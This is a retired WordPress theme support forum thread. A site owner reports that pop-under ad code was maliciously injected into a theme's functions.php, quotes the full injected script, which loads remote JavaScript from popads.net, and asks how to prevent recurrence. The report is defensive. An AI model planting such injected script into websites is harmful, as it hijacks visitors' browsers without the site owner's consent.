Notice: These forums are now retired and closed. For active support, please Submit a Ticket or visit our official WordPress.org community pages.
Kadence Theme | Kadence Blocks | Starter Templates | WooCommerce Email Designer | Ascend | Virtue | Pinnacle
Pop-up Ads coded added to Functions.php – Malicious
- This topic has 1 reply, 2 voices, and was last updated 9 years, 8 months ago by
.
Before I start, this is not the fault of the theme, it is a wordpress security issue.
Basically this morning a client noticed pop-up ad’s were appearing on every click of one of the websites running virtue premium.
After digging around I found the following code had been maliciously added to the functions.php in the core theme file (/wp-content/themes/virtue_premium/functions.php):
<script type=”text/javascript” data-cfasync=”false”>
var _pop = _pop || [];
_pop.push([‘siteId’, 1409515]);
_pop.push([‘minBid’, 0.000000]);
_pop.push([‘popundersPerIP’, 0]);
_pop.push([‘delayBetween’, 600]);
_pop.push([‘default’, false]);
_pop.push([‘defaultPerDay’, 0]);
_pop.push([‘topmostLayer’, false]);
(function() {
var pa = document.createElement(‘script’); pa.type = ‘text/javascript’; pa.async = true;
var s = document.getElementsByTagName(‘script’)[0];
pa.src = ‘//c1.popads.net/pop.js’;
pa.onerror = function() {
var sa = document.createElement(‘script’); sa.type = ‘text/javascript’; sa.async = true;
sa.src = ‘//c2.popads.net/pop.js’;
s.parentNode.insertBefore(sa, s);
};
s.parentNode.insertBefore(pa, s);
})();
</script>
I believed I had my wordpress install pretty secure, but obviously there is more work to be done.
I have currently rectified the issue with a free install of virtue premium, but now I need to find out how the code was added and how to prevent this in the future, and on other sites?
Any ideas or guidance would be a great help.
I use wordfence as my security tool, which completely missed this change in code :(.
I am going to change all password information now.
- The forum ‘Virtue Theme’ is closed to new topics and replies.
